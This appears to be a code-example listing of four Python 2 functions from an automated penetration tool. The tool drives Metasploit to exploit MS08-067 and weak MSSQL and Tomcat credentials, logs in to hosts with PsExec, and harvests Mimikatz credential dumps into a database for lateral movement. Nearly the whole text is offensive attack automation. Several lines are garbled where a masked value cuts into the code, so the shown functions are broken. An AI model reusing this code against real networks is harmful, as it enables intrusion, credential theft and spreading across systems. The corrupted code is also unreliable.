Exemple #1
0
def collectCredentials(footprint_id):
    logVal("cred",  "started")
    conf = ConfigParser.ConfigParser()
    conf.read("connections.conf")
    
    db = MySQLdb.connect(host="localhost", user=conf.get('MySQL',  'user'), passwd=conf.get('MySQL',  'pass'), db=conf.get('MySQL',  'db'))
    db.autocommit(True)
    
    msfpass = ""
    while msfpass == "":
        time.sleep(1)
        msfpass = dbfunctions.getMsfPass(db,  footprint_id)
    
    connected = False
    client = None
    console_id = None
    
    logVal("cred",  "got pass: "******"cred",  "got res: " + str(res))
    console_id = res['id']
    
    #while True:
    if True:
        if True:
            host_data = dbfunctions.getHostToLogInTo(db,  footprint_id)
            if host_data == None:
                logVal("cred",  "no hosts to log in to. will check again in 5 seconds")
                time.sleep(5)
            else:
                #try:
                if True:
                    logVal("cred",  "log in to host {0} with creds {1}\{2} : {3}".format(host_data[1],  host_data[3],  host_data[4],  host_data[5]))
                    lhost = netifaces.ifaddresses('eth0')[netifaces.AF_INET][0]['addr']
                    msflog = metasploitfunctions.loginWithPsExec(client,  console_id, lhost,  host_data[1],  msfpass,  host_data[3],  host_data[4],  host_data[5])
                    logVal("cred",  "logged into {0}. looking for creds".format(host_data[1]))
                    
                    loginSuccess = True
                    for l in msflog:
                        if l.find("STATUS_LOGON_FAILURE") > -1:
                            loginSuccess = False
                            logVal("cred",  "creds did not work on {0}".format(host_data[1]))
                            dbfunctions.addLoginAttemptResult(db,  host_data[0],  host_data[2],  False)
                            
                            
                    if loginSuccess:
                        logVal("cred",  "creds worked on {0}".format(host_data[1]))
                        dbfunctions.addLoginAttemptResult(db,  host_data[0],  host_data[2],  True)
                        creds = metasploitfunctions.extractMimikatzCreds(msflog)
                    
                        for cred in creds:
                            dbfunctions.addDomainCreds(db,  footprint_id,  cred[1],  cred[0],  cred[2],  "", "", "")
                            logVal("cred",  "adding creds {0} :: {1} :: {2}".format(cred[1],  cred[0],  cred[2]))
                #except:
                    #logVal("cred",  "an error occurred")
            cleanup = client.call('console.destroy',[console_id])
Exemple #2
0
def vulnExploiter(footprint_id,  options):
    conf = ConfigParser.ConfigParser()
    conf.read("connections.conf")
    
    db = MySQLdb.connect(host="localhost", user=conf.get('MySQL',  'user'), passwd=conf.get('MySQL',  'pass'), db=conf.get('MySQL',  'db'))
    db.autocommit(True)
    
    msfpass = ""
    while msfpass == "":
        time.sleep(1)
        msfpass = dbfunctions.getMsfPass(db,  footprint_id)
            
    while True:
        if options.exploitMs08067:
            host_data = dbfunctions.getHostVulnerableToMS08067(db,  footprint_id)
            if host_data == None:
                logVal("ms08",  "no vulnerable hosts. will check again in 5 seconds")
            else:
                print "exploiting ms08"
                p1 = multiprocessing.Process(target=exploitMS08067, args=(footprint_id, ))
                p1.start()
                p1.join()
        
        if options.expoitWeakMsSqlCreds:
            host_data = dbfunctions.getHostVulnerableWeakSqlCreds(db,  footprint_id)
            if host_data == None:
                logVal("sql",  "no vulnerable hosts. will check again in 5 seconds")
            else:
                print "exploiting sql"
                p2 = multiprocessing.Process(target=exploitWeakSqlCreds, args=(footprint_id, ))
                p2.start()
                p2.join()

        if options.exploitWeakTomcatCreds:
            host_data = dbfunctions.getHostVulnerableWeakTomcatCreds(db,  footprint_id)
            if host_data == None:
                logVal("tomcat",  "no vulnerable hosts. will check again in 5 seconds")
            else:
                print "exploiting tomcat"
                p2 = multiprocessing.Process(target=exploitWeakTomcatCreds, args=(footprint_id, ))
                p2.start()
                p2.join()
        
        if options.credPivot:
            host_data = dbfunctions.getHostToLogInTo(db,  footprint_id)
            if host_data == None:
                logVal("cred",  "no hosts to log in to. will check again in 5 seconds")
            else:
                #collectCredentials(footprint_id)
                print "logging in with known creds"
                p = multiprocessing.Process(target=collectCredentials, args=(footprint_id, ))
                p.start()
                p.join()
        
        time.sleep(1)
Exemple #3
0
def exploitMS08067(footprint_id):    
    logVal("ms08",  "started")
    conf = ConfigParser.ConfigParser()
    conf.read("connections.conf")
    
    db = MySQLdb.connect(host="localhost", user=conf.get('MySQL',  'user'), passwd=conf.get('MySQL',  'pass'), db=conf.get('MySQL',  'db'))
    db.autocommit(True)
    
    msfpass = ""
    while msfpass == "":
        time.sleep(2)
        msfpass = dbfunctions.getMsfPass(db,  footprint_id)
    
    connected = False
    client = None
    console_id = None
    
    logVal("ms08",  "got pass: "******"ms08",  "got res: " + str(res))
    console_id = res['id']
        
    logVal("ms08",  "connected")
    
    if True:
        #try:
        if True:
        #while True:
            host_data = dbfunctions.getHostVulnerableToMS08067(db,  footprint_id)
            if host_data == None:
                logVal("ms08",  "no vulnerable hosts. will check again in 5 seconds")
                time.sleep(5)
            else:
                try:
                    logVal("ms08",  "exploiting host {0}".format(host_data[0]))
                    lhost = netifaces.ifaddresses('eth0')[netifaces.AF_INET][0]['addr']
                    msflog = metasploitfunctions.exploitMS08067(client,  console_id, lhost,  host_data[0],  msfpass)
                    creds = metasploitfunctions.extractMimikatzCreds(msflog)
                
                    for cred in creds:
                        dbfunctions.addDomainCreds(db,  footprint_id,  cred[1],  cred[0],  cred[2],  "", "", "")
                        logVal("ms08",  "adding creds {0} :: {1} :: {2}".format(cred[1],  cred[0],  cred[2]))
                        
                    dbfunctions.setHostExploitedDate(db,  host_data[1])
                except:
                    logVal("sql",  "error exploiting host {0}".format(host_data[0]))
                    time.sleep(1)
Exemple #4
0
def exploitWeakTomcatCreds(footprint_id):
    logVal("tomcat",  "started")
    conf = ConfigParser.ConfigParser()
    conf.read("connections.conf")
    
    db = MySQLdb.connect(host="localhost", user=conf.get('MySQL',  'user'), passwd=conf.get('MySQL',  'pass'), db=conf.get('MySQL',  'db'))
    db.autocommit(True)
    
    msfpass = ""
    while msfpass == "":
        time.sleep(1)
        msfpass = dbfunctions.getMsfPass(db,  footprint_id)
    
    connected = False
    sqlclient = None
    sqlconsole_id = None
    
    logVal("tomcat",  "got pass: "******"tomcat",  "got res: " + str(sqlres))
    sqlconsole_id = sqlres['id']

    if True:
        if True:
#        while True:
            host_data = dbfunctions.getHostVulnerableWeakTomcatCreds(db,  footprint_id)
            if host_data == None:
                logVal("tomcat",  "no vulnerable hosts. will check again in 5 seconds")
                time.sleep(5)
            else:
                #try:
                if True:
                    logVal("tomcat",  "exploiting host {0}".format(host_data[0]))
                    lhost = netifaces.ifaddresses('eth0')[netifaces.AF_INET][0]['addr']
                    msflog = metasploitfunctions.exploitWeakTomcatCreds(sqlclient,  sqlconsole_id, lhost,  host_data[0],  msfpass,  host_data[3].split(":")[0],  host_data[3].split(":")[1].replace("<empty>",  ""))
                    logVal("tomcat",  "done exploiting {0}. extracting creds".format(host_data[0]))
                    creds = metasploitfunctions.extractMimikatzCreds(msflog)
                    
                    for cred in creds:
                        dbfunctions.addDomainCreds(db,  footprint_id,  cred[1],  cred[0],  cred[2],  "", "", "")
                        logVal("tomcat",  "adding creds {0} :: {1} :: {2}".format(cred[1],  cred[0],  cred[2]))
                    
                    dbfunctions.setHostExploitedDate(db,  host_data[1])